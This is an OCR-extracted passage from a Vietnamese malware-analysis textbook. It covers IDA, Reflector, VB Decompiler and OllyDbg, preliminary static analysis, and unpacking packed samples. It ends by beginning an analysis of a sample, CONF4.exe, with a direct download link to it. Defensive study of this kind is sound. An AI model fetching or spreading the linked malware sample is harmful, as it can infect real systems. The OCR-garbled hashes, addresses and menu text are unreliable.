
Jump to entrey point( ctrl-E) hiện lên vị trí các entry point ban đầu chỉ 
cần nhấp vào sẽ đưa ta đến vị trí làm việc ban đầu của nó. 

Sử dụng forward/ backward arrows bằng cách sử dụng nút jump trên 
thanh công cụ chọn jump to previous( Esc) hoặc jump to next( ctrl-enter), 


hoặc sử dụng nút trên màn hình làm việc. 


Menu Search với các tùy chọn tìm kiêm: 
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Options Windows Help 


Edit Jump View Debugger 


H eva netcode Alt+C ot tị at Fy xế ( 
next data Ctrl+D 
next explored Ctrl- A 
next unexplored Ctrl+U 
ei immediate value... Alt+I 
& next immediate value Ctrl+I 00403666 
00403698 
Kp tet. Alt+T de 
& next text Ctrl+T 00403700 
sequence of bytes... Alt+B 00403765 
MATE Assen zl HỢP 
sub 403815 — 00403815 
sub 40387F next void Ctrl+V 0040387F 
sub 4038EE error operand Ctrl+F 004038EE 
sub 403A0A k 00403A0A 
sub_403AAB op 00403AAB 
sub 403C35 all error operands 00403C35 
sub 403C67 "EX 00403C67 
sub 403C6B = 0040368 
sub_403C6F text 00403C6F 
sub 403C73 text 00403C73 
HideFile text 00403CC2 
suh 403DF3 text f0403DF3 


Hình 4-17: Menu Search 

Next code sẽ đi tìm đến vùng code tiếp theo(vùng này đã được định 
nghĩa, Disasm. 

Next data là sẽ đi đến vùng chứa dữ liệu tiếp theo. 

Next explored sẽ đi dến vùng đữ liệu tiếp theo được định nghĩa, sử 
dụng thành struct. 

Next unexplored thì ngược với next explored. 

Immediate valua sẽ hiện ra cửa sô tìm kiếm cá giá trị trong các struct, 
data. 


Text tìm kiêm các chuói có ky tự cụ thê trong tat cả các hàm, dir liệu. 
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Hình 4-18: Tim kiếm chuỗi cu thé 


Menu View 


| View Debugger Options Windows Help 


Open subviews ES Disassembly 
dÉ Graphs >| EF Hex dump 
i Toolbars >| Pseudocode FS 
D - | 
| Calculator... Shift+/ | 3) Exports 
i Recent scripts Alt+F9 | Ee ee 


ka Print segment registers Ctrl- Space | H Names Shift+F4 

| € Print internal flags F | te Functions Shift+ F3 

4 wm Hide MEE [sm Strings Shift+ F12 

| s | = Segments Shift+F7 

= Hide all | ER, Segment registers Shift+ F8 
Sf Unhide all Pë, Selectors 

Ge Se Eé EE | S9 Signatures Shift+F5 

n Type libraries Shift+F11 

| A Structures Shift+F9 

En Enumerations Shift+ F10 

ly Local types Shift+ F1 


Lal Cross references 
Wei Function calls 


| Ka Notepad 
| [3] Problems 


Hinh 4-19: Menu View 


Với open subview là mở các cửa sô view con trên các tab với: 


DisAssemBly, hexdump, export import ... là các cửa số đã có sẵn. Có 
thé mở thêm các cửa số như: 

PseudoCode là cửa số chứa mã C được tái tạo lại của function hiện tại 
của số Disaseembly. 

Segmen,SegmenRegister chứa các thông tin về các segmen, các thanh 
gi đoạn, các vùng dữ liệu. 

Signature,Type Lib chứa các chữ ký để xác định các chương trình dùng 
thư viện gi, xây dựng trên ngôn ngữ, cơ sở gi. 
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Tiếp theo sé là menu debuger chứa các tùy chon liên quan đến debuger 


gắn kèm theo IDA, nhưng ta tạm thời không xét vì các debuger này khá 


phức tạp, ta sẽ tìm hiểu debuger đơn giản hơn là OllyDebuger. 


Menu Options 


Menu này chứa các tùy chọn về complier: 


Compiler setup 
Compiler 


2 Unknown 

© Visual C++ 

D Borland C++ 

5 W'atcom C++ 
D GNU C++ 

©) Visual 4ge C++ 
D Delphi 


Default calling convention 


D Unknown 
© Cdecl 
C Stdcall 

D Pascal 

5 Fastcall 


D Thiscall 


Memory model Pointer size 


© Unknown 

D B4 bit 

5 Near 16bit, Far 32bit 
e Near 32bit, Far 46bit 


© Code Near, Data Near 
D Code Far, Data Far 
D Code Near, Data Far 
D Code Far. Data Near 


Default alignment 8 e 


sizeof(bool) 1 


v 


sizeof[int] A ~ Predefined macros _cdecl= cdecl; pascal: e 


sizeof(enum) Include directories ` "Program Files/Microsoft e 


[ Cancel | 


Hình 4-20: Cửa số tùy chọn về complier 

Disasembly cho phù hợp với các trình biên dich 

Tùy chon string style chọn các kiểu string tùy theo trình biên dịch, kiêu 
dữ liệu. 

Ngoài ra còn rất nhiều các tùy chọn liên quan dën cách dat tên cách 
hiển thị biéu đồ, chú thích... 

Menu Edit 

Chứa các tùy chọn: 

Code dé định nghĩa một vùng dữ liệu bytecode thành AsmCode. 

Data để địch nghĩa một vùng dữ liệu từ AsmCode thành các bytecode. 


String sẽ định nghĩa lại kiểu của các string. 
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Edit Jump Search View Debugger Options Windows Help 
| il | | Text - 
Begin selection Alt+L = 
Select identifier — Shift- Enter 2H a RS N aes: 
Off ~ - n mj ~ 
2191 Code c ay H: SHKA D 
bat Data Dk 
] p: Struct var... Alt+Q Hi 
1 "s" Strings > — = — — 
Le Aum Num* BEES] ESE IDA viewA [E7] 55] Hex View. 
> XX Undefine U = 
t H Rename N 
| 
| Operand type > 
| Comments d 
Segments > 3 
Structs D 1 
! Functions > | 
b Other D | 
| D s Tou Sample plugin Alt+0 
eee gier wen to wem së Alt+F12 
TT ex-Rays Decompiler 
lessageBoxA COM Helper 
IpenClipboard Sample chart builder 
;endDIgltemM essageA Change the callee address Alt+F11 
iendMessageA Universal Unpacker Manual Reconstruct 


Hinh 4-21: Menu Edit 

Và nhiều tùy chon khác liên quan đến việc chỉnh sửa các 
segments,struct, function... 

Nhung quan trọng nhất là Plugin nơi chứa các Pluign ma ta cài thêm 
vào. 

Dáng chü y nhát là Plugin HexRays Decomplier vói phím tát là F5 sé 
dich mót doan Assembly thành mót doan C. 

Plugin BinDiff cüng là Mót plugin rát quan trong cho phép ta so sánh 
có sở dữ liệu hiện tại với một co so dir liệu khác. Chí ra các function 


tương tự, giống nhau... 


4.1.6 Công cụ Reflector 
Đối với những loại được viết trên nền .NET cũng có các công cụ 
Decomplier riêng cho nó như Reflector, công cụ này cho phép ta dễ 
dàng quan sát, tìm kiếm, biên dịch ngược chương trình viết trên 
nén NET trở về mã nguồn C£, VB, C++, Delphi, IL, F#, Oxygene... 
Link download : http://shop.reflector.net/download 
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- Hle Edit View Tools Help 


.90l2nalns 
E La References 
m {}- 
E {} NETReflectorDemo 
E 77 MyClass 
gj V) Base Types 
& © Derived Types 
0 ,đor() 
P FindAllFiles : Void 
3j ^ FileCount: Int32 
m ® Files: List«Filelnfo» 
m "5 FolderPath : String 
m OF KeyWord: String 
gf folder path : String 
dë keyword: String 
E, result count : Int32 
H results : List<Filelnfo> 


PI 


public void FindAllFiles(); 


Declaring Type: NETReflectorDemo.MyClass 
Assembly: NETReflectorDemo, Versionz1.0.0.0 


^ 


Lé 


ein) 
a 


public void FindAllFiles() 
{ 
this.results,Clear(): 
Directorylnfo CurFolder = new DirectoryInfo(this.folder path); 
foreach (Filelnfo oFile in CurFolder.GetFiles()) 
{ 
if (oFile. Name.Contains(this.keyword)) 
{ 


& MyClass.FindAllFiles() : Void 


this.results,Add(oFile); 


} 
} 


this.result_count = this,results,Count; 


} 


4.1.7 Công cu VB Decomplier 
Link download http://www.vb-decompiler.org/ 


Như ta đã viết các chương trình trong Visual Basic có thể được dịch 
thành p-code( mã giả) đã được dịch hoặc thành code gốc. Ké từ khi p- 
code bao gồm nhiều lệnh cấp độ cao thì đã có một khả năng thực sự dé 
dịch ngược nó thành mã nguón. Vi vậy ta can VB Decomplier một trình 
dịch ngược cho các chương trình được viết trên chương trình Visual 
Basic( EXE,DLL hoặc OCX) để khôi phục nhiều lệnh p-code. Ngoài ra 
một bộ phân tích mã giúp tìm kiếm tất cả các chướng gọi chức năng API 
và tham chiếu chuỗi trong mã được phân tác và rồi thay đối chúng thành 


các diễn giải cho các chuôi phân tích. Nó là công cu cân thiệt nêu nhu 


Hình 4-22: Giao diện phần mềm Reflector 


mât mã nguôn và cân khôi phục lại. 
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& VB Decompiler v3, 2 - Registered to GPcH Soft 
File Tools Plugins Help 


FileName: — [D:\P-code\PictureVIEWER. exe m 


Objects Tree: Interface: [V] Compile stack parameters [V] Procedure analyzer and optimizer 


H 5 Project Private Sub Form Load() '412160 
& (3) Forms "Data Table: 402D6C 
DN Main loc_411FD8: On Error Goto 0 
D Password loc AUER: Password. Show (81, var B0 
S Search loc_41200E: var DN = CYar(Getsetting{"PictureVIEWER","Path”,"C 


& (2) UserControls 
= EI Code 


loc 41201F: If CBool{var_CO <> "") Then '412106 

loc 412047; var BÜ = CVar(CByte(Val(CStr(var C0)))) 'Byte 

5 F1 Main loc 41204B: For var ll4 = | To var B0; var F4 = var 114 "Ver 

E "m JE loc 412089: var 124 = CVar(Getsetting("PictureVIEUER" ,"Pat 
B PitureWieverl, 4109. loc 4120à6: Open CStr( (var 124 + "SHS. Shack$")) For Binary 
B PictureViever! _ 4110 loc 4120B(: Get cHl, cHl, var 8E 
ỹ loc 412002: Close «Hl 
B Form Activate 41156 loc 4l20EC: — Unknown.Collection.Add var 124, Chr$ (Clng(var. 
ÿ Form KeyPress 413Et loc 4120FD: Next var 114 'Variant 

= E] Alphablend loc 412103: GoTo loc 412122 

+#' |E ] dsASMpic loc 412106: End If 

EI Mouse5trolllpi 5 loc 412110; Search.Show «Hl, var Di 

&- E] Pictureviever loc 412122: ' Referenced frou: 412103 

+] Mover loc 41214À: Filel.Path = Ctr (Unknow, Collection, Item (1) | 

loc 41215E: Exit Sub 

‹ 


Decompiled OK 


Hinh 4-23: VB Decomplier 


Ngoài các công cu đã kê trên van con nhiêu loại công cụ khác đê phục 


vụ cho việc cho việc phân tích tĩnh. 

Ưu điểm phương pháp phân tích tĩnh này cho ta xem được code để 
xem mã độc hại làm gì chứ không cần phải chạy trên ngay hệ thống, hiểu 
được rõ nhất cũng như biết được các hoạt động chính xác của mã độc hại 
là làm gì. Tuy nhiên dé thực hiện được phương pháp này đòi hỏi người 
phân tích phải hiểu rõ về lập trinh và hệ thống. 

4.1.8 Công cụ Ollydebug 
4.1.8.1 Giới thiệu chung 
Phần mềm này giúp người phân tích có thé debug, xem quá trình chạy 
từng bước của chương trình. 
Dowload phan mềm tai trang http://www.ollydbg.de/ 
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4.1.8.2 Các chức nang cơ bản 
Đầu tiên người phân tích load file vào trong ollydbg ta sẽ được giao diện 
chương trình như sau: 


Modu le [^ 
pHodu Le SP BBl2FFSC 
GetHocu UM ci 9012FE 24 


RsrcName 
[ Inst 
LoadIcon S gen . <Modu LeEntryPoint? 


RercName 
[ Inst = : 
LoadCurs E 
7FFDF888( 4888) 


AONDIO 


IP. 
DWORD 
a 


LastErr ERROR_SXS_KEY_NOT_FOUND (00003687) 
96006246 (NO,NB,E,BE,NS,PE,GE,LE) 


empty Ø 
empty 
empty 


om 


Dialoge 
Ex itCode 
Ex itProc 


pel pee of oe oie be EE 


:[EBP+E1, 118 
.084010EE 


Control) 

[iis > 

GetDlgIt 5 Co P rr 
tim 2 Prec R,53 sk "11111 


(GT) 


Index = 
hind 
Setllindc 


[Par 
WP. 


RETURN to ntdll.7772377B ^ 


S FFC4|| FFFFFFFF| End of SEH chain 
Analysing keygen: 4 heuristical procedures, 30 calls to known functions 


Hinh 4-24 Giao dién lam viéc Ollydbg 
(1) The Dissembler Window: ở cửa số này ta nhìn thay các đoạn 


chương trình ở dang asm cùng với những lời giải thích cho các đoạn ma 
asm. 

(2) The Registry Window: đây là cửa số chứa thông tin chỉ tiết về các 
thanh ghi ,các có trạng thái. 

(3) The Stack Window: hién thị trạng thái của stack, lưu dữ tạm thời 
các dữ liệu và địa chỉ. 

(4) The Dump Window: cửa số hiển thị nội dung của bộ nhớ hoặc file, 
cửa số này cho phép ta tìm kiếm thực hiện các chức năng chỉnh sửa... 

Các tùy chọn với View 

View->log (cửa số L) cho chúng ta biết thông tin mà Olly ghi lại. Theo 
mặc định cửa số nảy sẽ lưu thông tin về các module, import libarary 


hoặc các Plugins được load cùng chương trình tại thời điểm đầu tiên khi 
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load chương trinh vào Olly, cùng với ghi lại các thông tin vé BP. Và 1 
chức năng nữa là khi ta muốn lưu lại thông tin về file Log ta chỉ viéc 
nhấp chuột phải trong cửa số L và chọn Log to file 

View-> Executable module( cửa số E) cửa số đưa ra danh sách những 
file có khả năng thực thi được chương trình sử dụng như file exe, dlls, ... 

View->Memory ( cửa số M) cửa số này cho ta biết thông tin về bộ nhớ 
dang được sử dụng. Tại cửa số này chúng ta có thé sử dung tinh năng 
search để tìm kiếm thông tin về các string, các đoạn hexa cụ thể hay 
unicode... thêm vào đó cùng cấp cho chúng ta những kiểu thiết đặt BP 
khác nhau tại section. 

View-> Threads ( cửa só T) liệt kê các thread của chương trình. 

View->window( cửa số W) để mở cửa số Window. 


View-> Handles( cửa sô H) dé mở cửa sô Handles. 


og. SE mmm 
[c] File [View ] Debug Plugins Options Window Help 
[IMP +» ae. |[E[M|*jW[m[e|z|K[B|R[s|s[ sms 
Memory Alt+M 
Heap 
Threads 
Windows 
Handles 
CPU Alt+C 
SEH chain mieu 
Patches Ctrl+P 
Call stack Alt+K 
Breakpoints Alt+B 1717 
Watches 
References PeatroReIFreeUn lool ntal li Re]FreeUn IcodeStr Ung 
Run trace 
Source -41,8 
80ED9E 
Source files 
File 
Text file 


Hình 4-25:Menu View 
View->CPU( cửa só C) cua sô dang làm việc hiện tại. 
View->Patches( cửa số /) cửa số này cho chúng ta biết thông tin về 
những gì mà chúng ta đã edit trong chương trình. 
View-> Call stack( cửa sô K) hiển thị một danh sách các lệnh Call mà 
chương trình của chúng ta đã thực hiện khi chúng ta Run bằng F9 và 
dùng F12 để tạm dừng chương trình. 
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View-> Breakpoint( cửa số B) hiển thi tất cả các BP mà chúng ta đặt 

trong chương trình. Nó sẽ hiển thị những BP được set bằng F2 còn đối 

với những dạng BP khác như HWBP va Memory BP sẽ không hién thi. 

View-> References( cửa số R) hiển thi kết quả khi thực hiện chức năng 

search trong Olly. 

Các tùy chọn đối với Debug 

F9( Run) khi nhắn olly sẽ tìm xem co breakpoint nao được set không, 
chương trình có tung ra các exception gì không, hay nếu chương trình có 
cơ chế chống debug Giao sẽ terminate ngay lập tức. 


K OllyDbg - keygen.exe - [CPU - main K 
[c] File View [Debug } — Options Window Help 


T m 
lax] Run F9 malede Es] JE? | 
FF Pause F12 itUserTÍ ntdl L.RELE rThre + 
Restart Ctrl+F2 
Close Alt+F2 
Step into F7 
Step over F8 
Animate into Ctrl+F7 
Animate over Ctrl+F8 T 
Execute till return Ctrl - F9 
Execute till user code Alt«F9 
Open or clear run trace i-i 
Trace into Ctrl+F11 
Trace over Ctrl+F12 dL L.Rt LFreeUn icodes 
Set condition Ctri- T 
Close run trace 
Hardware breakpoints 
Inspect 
Call DLL export ` 
Arguments 
Select import libraries 
Address [Hex du Ec I 
ce EE Sst EEE D 


Hinh 4-26: Menu Debug 

F12( Pause) tam dừng chương trình. 

Ctrl-F9( Execute till return) câu lệnh sẽ dừng lại ở RET 

Alt-F9( Execute till user code) khi trong quá trình phân tích bị lạc vào 
sâu bên trong trong khi debug thì ta sẽ dùng chức năng này dé đưa ta về 
vi trí hiện tai. 

F7( step into) thực thi trace từng dòng lệnh, trong quá rình trace gap 
lệnh Call sẽ nhảy vào bên trong lệnh Call va thực thi lệnh bên trong Call, 
khi nào gặp return sẽ trở về chương trình chính. 

F8( step over) thực thi trace từng dòng lệnh nhưng khác với F7 là khi 
gặp lệnh Call nó sẽ không nhảy vào bên trong trương trình mà dừng lại 
ngay ở câu lệnh tiếp theo dưới lệnh Call. 

Tuy chon Plugins 
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Plugins-> Ollydump-> dump debugged process dump một vùng nhớ 
trong process. 

Option-> Debugging Option( Alt-O) theo mac định chon auto start 
analysis thì chương trình khi được load vào sẽ được Olly tién hành phân 
tích và đưa ra các comment thích hợp. Nếu không chọn chức năng auto 
start analysic thì chúng ta sẽ phải thực hiện manual sau khi chương trình 
được load vào. 

Chuột phải vào cửa số Disassambler có các tùy chọn đang chú ý sau: 

Binary->edit thay đổi giá trị trong hex dump 

Goto->expression( Ctrl+G) đưa ta đến địa chi ta cần. 

Goto->previous quay trở lại call sau khi chọn follow 

New origin here( Ctrl+ Gray*) đưa chương trình đến thực hiện ở một 
dia chỉ khác tại vi trí mà ta chọn Crtl+Gray* 

Follow( enter) cho phép ta xem câu lệnh trong call ,mà ban thân nó 
không hé thực thi bat kì câu lệnh nào của chương trinh. 

Follow in dump cho ta xem giá trị tại ví trị ta chọn trong cửa số dump. 

Dé tìm kiếm các function hay string trong ollydebug: 
Với các function ta chon search for->all intermodular calls, hay 
chon go to-> expression to fllow và nhập tên ham vào bên trong. 

Với tìm kiếm các string ta chon search for-> all referenced text string 

Từ việc tim kiếm các ham và chuỗi ta sẽ đặt một BreakPoint( BP) tai đó 
như một điểm đánh dấu cho ta thực hiện chương trình . Dat BreakPoint 
được chia ra làm các loại sau: Common BreakPoint, Memory BreakPoint, 
Hardware BreakPoint,Conditional. 

Common BP ta đặt bằng cách tìm đến function hoặc string roi nhan F2, 
hoặc đặt thông qua command. Olly sẽ lưu dữ điểm đặt BP này tại cửa số 
BreakPoint ta có thé mở cửa sô này ra dé kiểm tra. Việc đặt BP ở trên 
chỉ đối với những opcode không bị thay đổi trong suốt quá trình thực 
hiện chương trình. 
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OllyDbg - keygen.exe main mod p " ~! 
[c] File View Debug Plugins Options Window Help - 


«jx| u wie dudd 2 Lejman] cxe Rs] sis?) 


fš ES 35030000 CALL <JMP. &comert2? Tn itCommoanControals xi Tn i tomm. < < 
6A aa PUSH o Thunk 
ES 19930000 | CALL <JMP.&kex Backup We 
a3 15954000 MOU DUORD PTR t 
E8 C4020000 SE GH iid 
EN E 
AS 22334000 | MOU DWORD PTR Binary v 
68 897Faa0@ | PUSH 7F89 
PUSH @ Assemble Space 
ES R828888 | CALL <.IHP.kuse Poin 
R3 26334000 |HQU DWORD PTR Label 
6A 88 PUSH Ø 
68 Zomme | PUSH keygen. og at ) 
6R 88 USH Comment d 3 32 OC FEFEFFFF) 
EF3S 1E334000| PUSH DWORD, PTA = 
ES 74020000 | CALL <.JHP.&use Breakpoint kẻ Toggle F2 
6A 88 PUSH @ š tự E 
E8 Crazeaea | CALL <JMP.&kex Hit trace > Conditional Shift+F2 
8 HOO EBP, ESP iti i 
SCH oc 19010 Che BUOD PIR Run trace » Conditional log Shift+F4 
ké eygen. el — 
DE Run to selection H 
| ES TH aeaa Bree Ss PTF New origin here Ctrl+Gray * 
| ES 62020000 | CALL <JMP. suse 
| 68 DZ114888 | PUSH keygen. ac Goto > Memory, on access 
NM E 
ES 970aoooo | PHÙU Site. suse Follow in Dump » Memory, on write 
RS 2A334000 | MOU DWORD PTR : 
| . EF3S 22334000) PUSH DWORD PTF View call tree Ctrl+K - 
| TW Hardware, on execution 
Search for 
Find references to 
View 
Copy to executable 
Analysis 
5 Dump debugged process 
| Program entry point Appearance 


Hinh 4-27: Tùy chon đáng chú ý trong cửa số Disassembler 

Memory BP việc đặt BP nay áp dụng cho những opcodes có thé bị thay 
đổi va Olly hỗ trợ chúng ta 2 kiểu đặt BP này trên memory là Breakpoint 
Memory on access va BreakPoint Memory on write. BreakPoint 
Memory on access việc dat BP này lên một vung nhớ sé cho phép ta 
dừng thực thi chương trình khi có bat kì sự thực thi nào, đọc hay ghi dé 
lên vùng dữ liệu mà ta đặt BP. BreakPoint Memory on write dừng 
chương trình thực thi khi có bất kì đữ liệu nào được ghi lên vùng nhớ mà 
đặt BP. Việc đặt BP tai memory sé không được lưu dữ thông tin tại cửa 
số BreakPoint. Olly chỉ cho đặt duy nhất 1 Bp tại memory nên khi đặt 
Bp thứ 2 vào thì Bp I sẽ tự được remove. 

Hardware BreakPoint( HWBP) ta có thé đặt được 4 HWBP nhiều hon 
so với memory breakpoint tại một thời điểm chỉ đặt được BP, không sử 
dụng ngắt INT3 mà sử dụng ngắt INT1. HWBP được hỗ trợ trực tiếp bởi 
CPU và sử dụng một số thanh ghi đặc biệt gọi là debug registry. Chúng 
ta sử dụng HWBP bởi vì nó không làm thay đổi các đoạn mã, stack. 
Chúng cũng không làm chậm tốc độ thực hiện. Chúng ta đặt HWBP tại 
đó nhưng không thấy dấu hiệu nao chứng tỏ là đã đặt cả, nên dé kiểm tra 
xem ta đặt nó ở đâu chọn debug-> Hardware 3 Breakpoint. Vói HWBP 
on write và HWBP on access thì ta chỉ cần bôi đen byte, word, Dword 


tùy ý muốn ở cửa số dump, sau đó đặt BP. 
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Conditional Breakpoint( shift-F2) cũng giống BP thông thường, tuy 
nhiên việc đặt Conditional BP phải thỏa mãn một điều kiện đã được thiết 
lập từ trước. Ta ấn chọn BP-> Conditional nhập vào điều kiện bên trong 
6 đó. Được lưu trong bảng Breakpoint. 

Conditional log Breakpoint( shift+F4) cũng giống như conditional BP 
nhưng nó có thêm tùy chọn cho phép ta lưu vết giá tri của biểu thức hoặc 
các tham số funtion mỗi khi xảy ra Bp hoặc khi thỏa mãn điều kiện ma ta 
yêu cầu. Những thông tin lưu dấu vết này sẽ được lưu tại Log(L) của 
Olly. 


4.2 Kỹ thuật phân tích sơ bộ 
Phân tích sơ bộ là bước dau tiên khi tiến hành phân tích phân tích tĩnh : 
Quá trình này xem xét kiểm tra cau trúc của file mã độc để có được 
thông tin sơ lược. 
Sử dụng các bước sau : 
- Quét qua các chương trình virus dé xác định mã độc hai. 
- Sù dụng giá tri băm dé định danh virus. 
- Thu thập thông tin từ cấu trúc của file (các headers ...), các hàm 
nhập/xuất và các chuỗi được sử dụng trong chương trình mã độc. 
- Su dụng từ các engine quét virus của các hãng : 
- http://www. virustotal.com 


- http://virusscan.jotti.org/vn 


- http://www.virscan.org/ 
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HE: ('1fobdab/Gcc75f47 c7 bc0367 e5201310121011823317 ccc 494849615981 

SHAT: fefoddf7 16194606224 1550090699becfca20528 

MŨ5 b4/32allablt†a24z3I3r1ab3cfe 60 G 0 
File size: 272.0 KB (278528 bytes ) 

File name: (1fobdab/Gcc75f47 c7 bc0367 e52b1310121011823317 ccc 4940496135881 

File type: Wind2 EXE 

Tags: |peexe | 

Detection ratio: 38/42 


Analysis date: — 2012-09-24 08:36:54 UTC (2 months ago ) 


Less details 


AhnLab-v3 Trojan/Win32.Jorik 20120823 
Antivir TR/Graftor. 18492 20120924 
Antiy-AVL WormWin32. WBNA, gen 20120911 
Avast Win32:VB-ABWG [Trj] 20120924 
AVG VBCcrypt.ESM 20120923 
BitDefender Gen: Variant. Barys.950 20120824 
ByteHero - 20120923 
CAT-QuickHeal Worm. Vobfus.Gen 20120924 
ClamAV - 20120923 
Commtouch W32/Vobfus. AD. gen!Eldorado 20120924 
Comodo Worm. Win32. VB. ALA 20120824 
DrWeb Trojan. VbCrypt.81 20120924 
Emsisoft Worm. Win32. WBNAIIK 20120919 
eSafe - 20120920 
ESET-NOD32 Win32/AutoRun. VB.ATT 20120924 
F-Prot W32/Vobfus.AD. genlEldorado 20120924 
F-Secure Gen: Variant. Barys.950 20120924 
- Binh danh malware thóng qua các hàm bám : MD5, SHA-1, SHA- 
2 


- Chia sé thong tin gitra các hang báo mát, các chuyén gia phan tích 
(virus trading) ... 
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e 
TE PED v0.93 


File: C:\Program Files\Hex Tools\BASECALC,EXE 
Entrypoint: 002ADB4 - EP Section: (CODE 


File Offset: [00024164 _ First Bytes: [55,8B,EC,63 | > | 


Linker Info: 2,25 Subsystem: 'Win32 GUI ` ` >| 


Borland Delphi 2.0 
Multi Scan | | Task Viewer | Options | About IL Exit | 
Iw Stay on top »» ||- >| 


PF PED v0.93 : 


File: C:\Program Files\Hex Toolslbasecalc.exe 


Entrypoint: ñ003F230 - EP Section: UPXl 
File Offset: 00015630 First Bytes: 60,BE,00,40 - 


Linker Info: 2,25 i Subsystem: Win32 GUI 


UPS 0.89.6 - 1,02 / 1,05 - 1.24 (Delphi) stub -> Markus & Laszlo| ` 


Multi Scan | | Task Viewer Options 


Iw Stay on top 


Thóng qua ma hash xét xem file dà duoc dinh danh hay chua. 
Tools : md5sum hoặc md5deep 


Liét ké các chuói kí tu có trong chuong trinh : 


Có cái nhìn khái quát vé các tính năng hoạt động của malware. 


MY ANALYSIS-strings ' 


rogram cannot be run in DOS mode. 
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- Kiém tra cấu trúc file thực thi (PE File Format) dé xác dinh : 

- Chay trên nén tảng hệ điều hành nào (32bits, 64bits ...). 

- Là file thực thi, thư viện liên kết động hay driver. 

- Các thư viện, các hàm được import, export (nếu là thư viện liên 
kết động). 


4.3 Phân tích giải nén các mẫu 
4.3.1 Bảo vệ mã độc bằng phương pháp nén mẫu 

Như đã trình bày về cấu trúc PE của các file trên Win, ta có thể mô tả 
các file được pack như trong hình vẽ. 


==. — 


Section chứa Packed-data 


Hình 96 File PE khi bị pack 

File được pack có cấu trúc như một búp bê ma ti ri u ska của Nga,với 
file chính chứa file packed data — là file gốc được nén, mã hóa. 

Packed file vẫn là một file PE có cấu trúc bình thường. Thường hoạt 
động như sau: 

Bước 1, Load thực thi từ Entry Point như bình thường với các section 
chứa code, import. 

Bước 2,Trong unpacker code cua trường trình thực hiện lưu các giá tri 
của các thanh ghi, cờ ... rồi thực hiện giải mã, giải nén, viết lại File như 
trước khi bị pack từ vùng nhớ chứa file đã được nén, mã hóa — Packed 
data. 

Bước 3, Tiếp tục thực hiện việc lay địa chỉ của các windows API, tự 
điền lại các địa chỉ này lại dé hoàn chỉnh import table của file vừa được 
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gai mã tại vùng nhớ chứa Packed-data ( Ở các file thông thường việc này 
được windows thực hiện tự động khi file được load vào bộ nhớ. Quá 
trình này thường su dụng các API như GetProcAddress, LoadLibraryA 
DI 
Bước 4, Tir section code sẽ thực hiện phục hồi lai các thanh ghi rồi 
jump đến EntryPoint (OEP) của file mới được phục hồi từ packed-data. 
Minh họa sau khi bước 2 thực hiện xong ta có: 
Section chứa Packed-data với kích thước bành trướng. 
Khi được giải nén/mã 


DOS header 
PE header 


Section Table 


Section 1 


Section 2 


DOS header 


PE header 
Section Table 


Section 1 


Section ........ 


Hinh 4-28: Khi duoc giai nén 
Ngoài ra trong buóc 2 unpacker code cón có thé thuc hién nhiéu thü 
doan kiém tra xem có bi debug khóng, kiém tra xem dang chay trong mói 
truóng ào hay thuc, rói thuc hién dánh lac huóng, can tró cóng viéc unpack, 
diéu tra. k 
4.3.2 Giái nén máu mä dóc 

Có nhiéu phuong pháp dé unpack mót file nhu: 

Cáchl: Phan tích hàm giải mã/ giải nén sau đó tự giải mã các thông tin 
về file trước khi bị pack trong packed-data. Khôi phục lại file gần như 
nguyên gốc. 

Cách 2 tìm địa chỉ Entrypoint của file gốc (OEP) Break point hoặc 
trace dần để debuger dừng lại tại địa chỉ này Dump bộ nhớ của process 


này, rồi thực hiện việc tạo lại bang IAT phù hợp với file mới. 
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Cách 3 xác dinh packer nếu là các packer phó bién có thé tìm kiếm 
được các trường trình tự động unpack. 

Ở đây ta sử dụng phương án 2 là chính do nó đơn giản hơn, an toàn hơn. 

Load chương trình vào trình Debug (ở day ta dùng OllyDebug). 

Bước 1: Tìm kiếm, Xác định OEP 

Cách 1: OEP thường được nhảy đến bằng một lệnh Jump Far( đôi khi là 
một cặp lệnh push OEP address — ret ). Trước lệnh jump này thường là 
đoạn khôi phục lại các thanh ghi, xóa các thanh ghi của unpacker code, 
phía trên một chút nữa thường là đoạn code thực hiện tai tạo lại import 
table của file gốc. Ta có thể xác định các vị trí này bằng các cách như đặt 
break point tại các địa chỉ của các giá trị lưu trong các thanh ghi, Đặt 
break point tại các hàm loadlibrary, getprocaddress. 

Vi dụ khi unpack UPX packer ta đặt hard ware tại địa chỉ chứa giá tri ở 
đỉnh stack, khi phục hồi lại các thanh ghi để chuẩn bị nhảy đến OEP 
chương trình sẽ pause lại, lúc này ta dễ dàng nhìn thấy lệnh jump đến 
OEP. 

Cách 2: Dựa vào việc đặt các Break Point vào các ham Virtual Alloc 
(phân quyền lai cho các vùng nhớ ). Dé xác định các vùng nhớ được 
phân quyền từ đây có thé suy ra sau khi giải mã/ giải nén file được write 
lại vào đâu. Rồi sau đó ta có thé khôi phục lại từ các vùng nhớ nảy thành 
file gốc.Đặt memory break point tại section mà file được write vào. Dựa 
vào việc đến số lần bị pause cho đến khi file run hoàn toàn dé xác định 
OEP. 

Buóc 2: Dump Execute Memory Image. Dát break Point dé chuong 
trinh dừng lại tai OEP. Dung các tool nhu Plugin OllyDump cua Ollydbg 
hoác Lord PE, PE tool dé dump, sua lai EP cua file sau khi dump thành 
OEP cho chính xác. 

Bước 3: Xây dung lai import table. Sử dụng ImportREC dé xây dựng 
lai import table. 

Các file pack thuóng có các chire nang tu kiém tra xem nó có bi chay 
trên trinh debug nào không, có bị sửa đổi gi không ... Van dé này sé 


được trinh bày ở các phan tiếp theo. 
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4.5 Phan tích sử dung kỹ thuật dich ngược 
Phân tích 1 file mẫu : CONF4.exe 
Link Download mẫu: http://dl.dropbox.com/u/47379175/conf4.zip 


Load vào trong Exeinfo PE: 


de xox 


— a 0 0o ` Jj. ModC¿ 
D Exeinfo PE - ver.0.0.3.1 by A.S.L - 645 sign 2012.05.18 Y 
conf4.exe (m)(&) LG 1. Res 

Entry Point: 00022000 oo («) EPSection: ,EndTz (um 6MB d New fo 

File Offset: 00018800 First Bytes ` B8.48.33.40.00 [=] [5] (Plua L neus 

Linker Info: 2,25 SubSystem : Windows GUI |£absuts| : SN 

| FileSize:  0001C2B0h Overlay: 0000980  ' (Options ) di Falle 

| Image is 32bit executable RES/OVL:81/2% 2004 C Set Jh http. 
heck : FXF &TICKFR f 256 hute« Y like DatFiv FakeSinner nr PeShihOFP. Í>Ì —— MÔ xà + 


Lam SIGNATURE: 0 
try 
g Generic check : EXE STICKER ( 256 bytes ) like DotFix FakeSigner or PeStubOEP 


cuong ELICX.CdiLOi Olly(DQ12CXC 


yog Ley Did 2243:1015 
Shortcut NEO Shortcut telen Shortcut 


A Zeus 


Hình 4-29 Quan sát thông tin của mẫu mã độc hai 


